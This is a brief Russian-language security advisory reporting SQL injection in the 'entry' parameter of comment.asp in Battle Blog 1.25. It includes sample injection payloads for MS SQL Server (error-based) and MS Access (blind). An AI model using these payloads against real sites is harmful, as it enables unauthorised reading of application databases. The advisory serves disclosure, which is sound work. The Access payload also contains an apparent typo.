Программа: Battle Blog 1.25
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «entry» сценарием comment.asp. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Пример:
/comment.asp?entry={SQL}
-----> Для MS SQL Server : 22+and+1=convert(int,(select+@@version))--
-----> Для Ms ACCESS (Blind-Way) : IIF((select%20mid(last(Name),1,1)
%20from%20(select%20top%2010%20Namee %20from%20MSysObjects))='a',0,'done')%00
